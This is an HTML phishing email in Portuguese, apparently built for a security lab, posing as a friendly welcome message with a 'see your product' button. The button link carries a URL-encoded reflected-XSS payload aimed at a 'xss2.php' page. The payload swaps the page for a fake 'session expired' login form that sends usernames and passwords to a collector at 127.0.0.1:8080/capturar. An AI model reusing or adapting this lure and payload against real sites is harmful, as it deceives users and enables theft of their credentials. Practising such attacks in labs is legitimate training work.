<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <title>Email de Boas Vindas</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 40px;
            background-color: #f4f4f4;
            color: #333;
        }
        .email-container {
            background-color: #ffffff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 4px 8px rgba(0,0,0,0.1);
        }
        .welcome-text {
            font-size: 18px;
            margin-bottom: 20px;
        }
        .link-button {
            display: inline-block;
            text-decoration: none;
            color: white;
            background-color: #007BFF;
            padding: 10px 20px;
            border-radius: 5px;
            font-weight: bold;
        }
        .link-button:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <div class="email-container">
        <h1>Olá!</h1>
        <p class="welcome-text">Seja bem-vindo ao nosso sistema! Estamos muito felizes por tê-lo conosco.</p>
	<p class="welcome-text">Para ver seu produto click no botão abaixo.</p>
        <a href="./laboratorio/xss2.php?data=document.body.innerHTML%20%3D%20%27%3Ch1%3ESua%20sess%C3%A3o%20expirou%3C%2Fh1%3E%27%20%2B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%27%3Cp%3EPor%20favor%2C%20fa%C3%A7a%20login%20novamente%3C%2Fp%3E%27%20%2B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%27%3Cform%20action%3D%22http%3A%2F%2F127.0.0.1:8080%2Fcapturar%22%20method%3D%22POST%22%3E%27%20%2B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%27Usu%C3%A1rio%3A%20%3Cinput%20type%3D%22text%22%20name%3D%22usuario%22%3E%3Cbr%3E%27%20%2B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%27Senha%3A%20%3Cinput%20type%3D%22password%22%20name%3D%22senha%22%3E%3Cbr%3E%27%20%2B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%27%3Cinput%20type%3D%22submit%22%20value%3D%22Login%22%3E%27%20%2B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%27%3C%2Fform%3E%27%3B" class="link-button">Clique aqui para ver seu Produto</a>
    </div>
</body>
</html>
